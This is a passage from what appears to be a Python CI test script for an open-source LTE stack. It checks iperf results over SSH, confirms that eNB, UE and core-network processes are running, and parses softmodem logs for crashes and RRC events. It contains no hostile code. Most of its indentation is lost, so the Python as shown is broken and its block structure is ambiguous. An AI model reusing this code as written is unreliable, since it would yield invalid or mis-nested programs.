lock = Lock()
if iperf_status < 0:
			message = 'iperf on OAI UE crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
clientStatus = -2
else:
if self.iperf_options == 'sink':
clientStatus = 0
status_queue.put(0)
status_queue.put('OAI-UE')
status_queue.put('10.0.1.2')
status_queue.put('Sink Test : no check')
else:
clientStatus = self.Iperf_analyzeV2Output(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
self.close()
# Stopping the iperf server
if self.iperf_options != 'sink':
self.open(iServerIPAddr, iServerUser, iServerPasswd)
self.command('killall --signal SIGKILL iperf', '\$', 5)
time.sleep(0.5)
self.close()
		if (clientStatus == -1):
			# Retrieve the server log once: analyze it and copy it to the EPC server for log collection
			if (os.path.isfile('iperf_server_' + self.testCase_id + '_OAI-UE.log')):
				os.remove('iperf_server_' + self.testCase_id + '_OAI-UE.log')
			copyin_res = self.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
			self.Iperf_analyzeV2Server(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
			if (copyin_res == 0):
				self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_OAI-UE.log', self.EPCSourceCodePath + '/scripts')
copyin_res = self.copyin(iClientIPAddr, iClientUser, iClientPasswd, '/tmp/tmp_iperf_' + self.testCase_id + '.log', 'iperf_' + self.testCase_id + '_OAI-UE.log')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_OAI-UE.log', self.EPCSourceCodePath + '/scripts')
iperf_noperf = False
		iperf_status = not status_queue.empty()
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def Iperf(self):
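		"""
		Top-level Iperf test case: dispatches to IperfNoS1 when the eNB runs in
		noS1 mode, otherwise spawns one Iperf_common process per UE and turns
		the collected status_queue entries into an HTML test row.
		"""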
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is not None:
self.IperfNoS1()
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
i = 0
ue_num = len(self.UEIPAddresses)
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = SSH.Iperf_common, args = (lock,UE_IPAddress,device_id,i,ue_num,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.iperf_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
iperf_status = True
iperf_noperf = False
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def CheckProcessExist(self, check_eNB, check_OAI_UE):
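		"""
		Check in parallel that the expected processes are still alive: HSS, MME
		and SPGW (skipped in noS1 mode) plus, when requested, the eNB and the
		OAI UE. Returns 0 on success, a negative status code otherwise.
		"""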
multi_jobs = []
status_queue = SimpleQueue()
# in noS1 config, no need to check status from EPC
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is None:
p = Process(target = SSH.CheckHSSProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckMMEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckSPGWProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
else:
if (check_eNB == False) and (check_OAI_UE == False):
return 0
if check_eNB:
p = Process(target = SSH.CheckeNBProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
if check_OAI_UE:
p = Process(target = SSH.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == ENB_PROCESS_FAILED:
fileCheck = re.search('enb_', str(self.eNBLogFiles[0]))
if fileCheck is not None:
self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + self.eNBLogFiles[0], '.')
logStatus = self.AnalyzeLogFile_eNB(self.eNBLogFiles[0])
if logStatus < 0:
result = logStatus
self.eNBLogFiles[0] = ''
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.TerminateFlexranCtrl()
return result
def CheckOAIUEProcessExist(self, initialize_OAI_UE_flag):
multi_jobs = []
status_queue = SimpleQueue()
if initialize_OAI_UE_flag == False:
p = Process(target = SSH.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == OAI_UE_PROCESS_FAILED:
fileCheck = re.search('ue_', str(self.UELogFile))
if fileCheck is not None:
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
if logStatus < 0:
result = logStatus
return result
def CheckOAIUEProcess(self, status_queue):
try:
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m OAI UE Process Not Found! \u001B[0m')
status_queue.put(OAI_UE_PROCESS_FAILED)
else:
status_queue.put(OAI_UE_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckeNBProcess(self, status_queue):
try:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m eNB Process Not Found! \u001B[0m')
status_queue.put(ENB_PROCESS_FAILED)
else:
status_queue.put(ENB_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckHSSProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never hss | grep -v grep', '\$', 5)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
result = re.search('oai_hss -j', str(self.ssh.before))
elif re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
result = re.search('hss_sim s6as diam_hss', str(self.ssh.before))
			else:
				logging.error('This should not happen!')
				result = None
if result is None:
logging.debug('\u001B[1;37;41m HSS Process Not Found! \u001B[0m')
status_queue.put(HSS_PROCESS_FAILED)
else:
status_queue.put(HSS_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckMMEProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never mme | grep -v grep', '\$', 5)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
result = re.search('mme -c', str(self.ssh.before))
elif re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
result = re.search('mme', str(self.ssh.before))
			else:
				logging.error('This should not happen!')
				result = None
if result is None:
logging.debug('\u001B[1;37;41m MME Process Not Found! \u001B[0m')
status_queue.put(MME_PROCESS_FAILED)
else:
status_queue.put(MME_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckSPGWProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep --color=never spgw | grep -v grep', '\$', 5)
result = re.search('spgwu -c ', str(self.ssh.before))
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep --color=never spgw | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep --color=never xGw | grep -v grep', '\$', 5)
result = re.search('xGw', str(self.ssh.before))
			else:
				logging.error('This should not happen!')
				result = None
if result is None:
logging.debug('\u001B[1;37;41m SPGW Process Not Found! \u001B[0m')
status_queue.put(SPGW_PROCESS_FAILED)
else:
status_queue.put(SPGW_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AnalyzeLogFile_eNB(self, eNBlogFile):
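		"""
		Scan a retrieved eNB log file, counting RRC, RACH and X2 handover
		events as well as error indicators (segmentation faults, assertions,
		real-time issues, RLC discards). Fills self.htmleNBFailureMsg and
		returns 0 or a negative ENB_PROCESS_* code.
		"""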
if (not os.path.isfile('./' + eNBlogFile)):
return -1
enb_log_file = open('./' + eNBlogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
rrcSetupComplete = 0
rrcReleaseRequest = 0
rrcReconfigRequest = 0
rrcReconfigComplete = 0
rrcReestablishRequest = 0
rrcReestablishComplete = 0
rrcReestablishReject = 0
rlcDiscardBuffer = 0
rachCanceledProcedure = 0
uciStatMsgCount = 0
pdcpFailure = 0
ulschFailure = 0
cdrxActivationMessageCount = 0
dropNotEnoughRBs = 0
mbmsRequestMsg = 0
self.htmleNBFailureMsg = ''
isRRU = False
isSlave = False
slaveReceivesFrameResyncCmd = False
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_inNbProcedures = 0
X2HO_outNbProcedures = 0
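		# Line-by-line state machine: an incoming X2 handover walks
		# REQ -> RRC reconfiguration complete -> path switch -> switch ACK,
		# while an outgoing one completes on the UE context release.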
for line in enb_log_file.readlines():
if X2HO_state == X2_HO_REQ_STATE__IDLE:
result = re.search('target eNB Receives X2 HO Req X2AP_HANDOVER_REQ', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_RECEIVES_REQ
result = re.search('source eNB receives the X2 HO ACK X2AP_HANDOVER_REQ_ACK', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK
if X2HO_state == X2_HO_REQ_STATE__TARGET_RECEIVES_REQ:
result = re.search('Received LTE_RRCConnectionReconfigurationComplete from UE', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE
if X2HO_state == X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE:
result = re.search('issue rrc_eNB_send_PATH_SWITCH_REQ', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ
if X2HO_state == X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ:
result = re.search('received path switch ack S1AP_PATH_SWITCH_REQ_ACK', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_inNbProcedures += 1
if X2HO_state == X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK:
result = re.search('source eNB receives the X2 UE CONTEXT RELEASE X2AP_UE_CONTEXT_RELEASE', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_outNbProcedures += 1
if self.eNBOptions[int(self.eNB_instance)] != '':
res1 = re.search('max_rxgain (?P<requested_option>[0-9]+)', self.eNBOptions[int(self.eNB_instance)])
res2 = re.search('max_rxgain (?P<applied_option>[0-9]+)', str(line))
if res1 is not None and res2 is not None:
requested_option = int(res1.group('requested_option'))
applied_option = int(res2.group('applied_option'))
if requested_option == applied_option:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ok-circle"></span> Command line option(s) correctly applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.eNBOptions[int(self.eNB_instance)] + '\n\n'
else:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ban-circle"></span> Command line option(s) NOT applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.eNBOptions[int(self.eNB_instance)] + '\n\n'
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('[Ss]egmentation [Ff]ault', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte_build_oai/build/lte-softmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('Setting function for RU', str(line))
if result is not None:
isRRU = True
if isRRU:
result = re.search('RU 0 is_slave=yes', str(line))
if result is not None:
isSlave = True
if isSlave:
result = re.search('Received RRU_frame_resynch command', str(line))
if result is not None:
slaveReceivesFrameResyncCmd = True
result = re.search('LTE_RRCConnectionSetupComplete from UE', str(line))
if result is not None:
rrcSetupComplete += 1
result = re.search('Generate LTE_RRCConnectionRelease|Generate RRCConnectionRelease', str(line))
if result is not None:
rrcReleaseRequest += 1
result = re.search('Generate LTE_RRCConnectionReconfiguration', str(line))
if result is not None:
rrcReconfigRequest += 1
result = re.search('LTE_RRCConnectionReconfigurationComplete from UE rnti', str(line))
if result is not None:
rrcReconfigComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentRequest', str(line))
if result is not None:
rrcReestablishRequest += 1
result = re.search('LTE_RRCConnectionReestablishmentComplete', str(line))
if result is not None:
rrcReestablishComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentReject', str(line))
if result is not None:
rrcReestablishReject += 1
result = re.search('CDRX configuration activated after RRC Connection', str(line))
if result is not None:
cdrxActivationMessageCount += 1
result = re.search('uci->stat', str(line))
if result is not None:
uciStatMsgCount += 1
result = re.search('PDCP.*Out of Resources.*reason', str(line))
if result is not None:
pdcpFailure += 1
result = re.search('ULSCH in error in round', str(line))
if result is not None:
ulschFailure += 1
result = re.search('BAD all_segments_received', str(line))
if result is not None:
rlcDiscardBuffer += 1
result = re.search('Canceled RA procedure for UE rnti', str(line))
if result is not None:
rachCanceledProcedure += 1
result = re.search('dropping, not enough RBs', str(line))
if result is not None:
dropNotEnoughRBs += 1
if self.eNBmbmsEnables[int(self.eNB_instance)]:
result = re.search('MBMS USER-PLANE.*Requesting.*bytes from RLC', str(line))
if result is not None:
mbmsRequestMsg += 1
enb_log_file.close()
logging.debug(' File analysis completed')
if uciStatMsgCount > 0:
statMsg = 'eNB showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if pdcpFailure > 0:
statMsg = 'eNB showed ' + str(pdcpFailure) + ' "PDCP Out of Resources" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if ulschFailure > 0:
statMsg = 'eNB showed ' + str(ulschFailure) + ' "ULSCH in error in round" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if dropNotEnoughRBs > 0:
statMsg = 'eNB showed ' + str(dropNotEnoughRBs) + ' "dropping, not enough RBs" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if rrcSetupComplete > 0:
rrcMsg = 'eNB completed ' + str(rrcSetupComplete) + ' RRC Connection Setup(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReleaseRequest > 0:
rrcMsg = 'eNB requested ' + str(rrcReleaseRequest) + ' RRC Connection Release(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReconfigRequest > 0 or rrcReconfigComplete > 0:
rrcMsg = 'eNB requested ' + str(rrcReconfigRequest) + ' RRC Connection Reconfiguration(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReconfigComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReestablishRequest > 0 or rrcReestablishComplete > 0 or rrcReestablishReject > 0:
rrcMsg = 'eNB requested ' + str(rrcReestablishRequest) + ' RRC Connection Reestablishment(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishReject) + ' were rejected'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if self.eNBmbmsEnables[int(self.eNB_instance)]:
if mbmsRequestMsg > 0:
rrcMsg = 'eNB requested ' + str(mbmsRequestMsg) + ' times the RLC for MBMS USER-PLANE'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if X2HO_inNbProcedures > 0:
rrcMsg = 'eNB completed ' + str(X2HO_inNbProcedures) + ' X2 Handover Connection procedure(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if X2HO_outNbProcedures > 0:
rrcMsg = 'eNB completed ' + str(X2HO_outNbProcedures) + ' X2 Handover Release procedure(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if self.eNBOptions[int(self.eNB_instance)] != '':
res1 = re.search('drx_Config_present prSetup', self.eNBOptions[int(self.eNB_instance)])
if res1 is not None:
if cdrxActivationMessageCount > 0:
rrcMsg = 'eNB activated the CDRX Configuration for ' + str(cdrxActivationMessageCount) + ' time(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
else:
rrcMsg = 'eNB did NOT ACTIVATE the CDRX Configuration'
logging.debug('\u001B[1;37;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rachCanceledProcedure > 0:
rachMsg = 'eNB cancelled ' + str(rachCanceledProcedure) + ' RA procedure(s)'
logging.debug('\u001B[1;30;43m ' + rachMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rachMsg + '\n'
if isRRU:
if isSlave:
if slaveReceivesFrameResyncCmd:
rruMsg = 'Slave RRU received the RRU_frame_resynch command from RAU'
logging.debug('\u001B[1;30;43m ' + rruMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rruMsg + '\n'
else:
rruMsg = 'Slave RRU DID NOT receive the RRU_frame_resynch command from RAU'
logging.debug('\u001B[1;37;41m ' + rruMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rruMsg + '\n'
self.prematureExit = True
return ENB_PROCESS_SLAVE_RRU_NOT_SYNCED
if foundSegFault:
logging.debug('\u001B[1;37;41m eNB ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;37;41m eNB ended with an assertion! \u001B[0m')
self.htmleNBFailureMsg += msgAssertion
return ENB_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m eNB faced real time issues! \u001B[0m')
self.htmleNBFailureMsg += 'eNB faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if rlcDiscardBuffer > 0:
rlcMsg = 'eNB RLC discarded ' + str(rlcDiscardBuffer) + ' buffer(s)'
logging.debug('\u001B[1;37;41m ' + rlcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rlcMsg + '\n'
return ENB_PROCESS_REALTIME_ISSUE
return 0
def AnalyzeLogFile_UE(self, UElogFile):
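		"""
		Scan a retrieved UE log file: extract MIB, carrier frequency, PLMN and
		operator information, count connection and failure indicators, and
		return 0 or a negative process status code.
		"""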
if (not os.path.isfile('./' + UElogFile)):
return -1
ue_log_file = open('./' + UElogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
uciStatMsgCount = 0
pdcpDataReqFailedCount = 0
badDciCount = 0
rrcConnectionRecfgComplete = 0
no_cell_sync_found = False
mib_found = False
frequency_found = False
plmn_found = False
mbms_messages = 0
self.htmlUEFailureMsg = ''
for line in ue_log_file.readlines():
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('System error|[Ss]egmentation [Ff]ault|======= Backtrace: =========|======= Memory map: ========', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte-uesoftmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('uci->stat', str(line))
if result is not None and not exitSignalReceived:
uciStatMsgCount += 1
result = re.search('PDCP data request failed', str(line))
if result is not None and not exitSignalReceived:
pdcpDataReqFailedCount += 1
result = re.search('bad DCI 1A', str(line))
if result is not None and not exitSignalReceived:
badDciCount += 1
result = re.search('Generating RRCConnectionReconfigurationComplete', str(line))
if result is not None:
rrcConnectionRecfgComplete += 1
# No cell synchronization found, abandoning
result = re.search('No cell synchronization found, abandoning', str(line))
if result is not None:
no_cell_sync_found = True
if self.eNBmbmsEnables[0]:
result = re.search('TRIED TO PUSH MBMS DATA', str(line))
if result is not None:
mbms_messages += 1
result = re.search("MIB Information => ([a-zA-Z]{1,10}), ([a-zA-Z]{1,10}), NidCell (?P<nidcell>\d{1,3}), N_RB_DL (?P<n_rb_dl>\d{1,3}), PHICH DURATION (?P<phich_duration>\d), PHICH RESOURCE (?P<phich_resource>.{1,4}), TX_ANT (?P<tx_ant>\d)", str(line))
if result is not None and (not mib_found):
try:
mibMsg = "MIB Information: " + result.group(1) + ', ' + result.group(2)
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " nidcell = " + result.group('nidcell')
self.htmlUEFailureMsg += mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " n_rb_dl = " + result.group('n_rb_dl')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_duration = " + result.group('phich_duration')
self.htmlUEFailureMsg += mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_resource = " + result.group('phich_resource')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " tx_ant = " + result.group('tx_ant')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mib_found = True
except Exception as e:
logging.error('\033[91m' + "MIB marker was not found" + '\033[0m')
result = re.search("Measured Carrier Frequency (?P<measured_carrier_frequency>\d{1,15}) Hz", str(line))
if result is not None and (not frequency_found):
try:
mibMsg = "Measured Carrier Frequency = " + result.group('measured_carrier_frequency') + ' Hz'
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
frequency_found = True
except Exception as e:
logging.error('\033[91m' + "Measured Carrier Frequency not found" + '\033[0m')
result = re.search("PLMN MCC (?P<mcc>\d{1,3}), MNC (?P<mnc>\d{1,3}), TAC", str(line))
if result is not None and (not plmn_found):
try:
mibMsg = 'PLMN MCC = ' + result.group('mcc') + ' MNC = ' + result.group('mnc')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
plmn_found = True
except Exception as e:
logging.error('\033[91m' + "PLMN not found" + '\033[0m')
result = re.search("Found (?P<operator>[\w,\s]{1,15}) \(name from internal table\)", str(line))
if result is not None:
try:
mibMsg = "The operator is: " + result.group('operator')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "Operator name not found" + '\033[0m')
result = re.search("SIB5 InterFreqCarrierFreq element (.{1,4})/(.{1,4})", str(line))
if result is not None:
try:
mibMsg = "SIB5 InterFreqCarrierFreq element " + result.group(1) + '/' + result.group(2)
self.htmlUEFailureMsg += mibMsg + ' -> '
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "SIB5 InterFreqCarrierFreq element not found" + '\033[0m')
result = re.search("DL Carrier Frequency/ARFCN : (?P<carrier_frequency>\d{1,15}/\d{1,4})", str(line))
if result is not None:
try:
freq = result.group('carrier_frequency')
new_freq = re.sub('/[0-9]+','',freq)
float_freq = float(new_freq) / 1000000
self.htmlUEFailureMsg += 'DL Freq: ' + ('%.1f' % float_freq) + ' MHz'
logging.debug('\033[94m' + " DL Carrier Frequency is: " + freq + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " DL Carrier Frequency not found" + '\033[0m')
result = re.search("AllowedMeasBandwidth : (?P<allowed_bandwidth>\d{1,7})", str(line))
if result is not None:
try:
prb = result.group('allowed_bandwidth')
self.htmlUEFailureMsg += ' -- PRB: ' + prb + '\n'
logging.debug('\033[94m' + " AllowedMeasBandwidth: " + prb + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " AllowedMeasBandwidth not found" + '\033[0m')
ue_log_file.close()
if rrcConnectionRecfgComplete > 0:
statMsg = 'UE connected to eNB (' + str(rrcConnectionRecfgComplete) + ' RRCConnectionReconfigurationComplete message(s) generated)'
logging.debug('\033[94m' + statMsg + '\033[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if uciStatMsgCount > 0:
statMsg = 'UE showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if pdcpDataReqFailedCount > 0:
statMsg = 'UE showed ' + str(pdcpDataReqFailedCount) + ' "PDCP data request failed" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if badDciCount > 0:
statMsg = 'UE showed ' + str(badDciCount) + ' "bad DCI 1A" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if self.eNBmbmsEnables[0]:
if mbms_messages > 0:
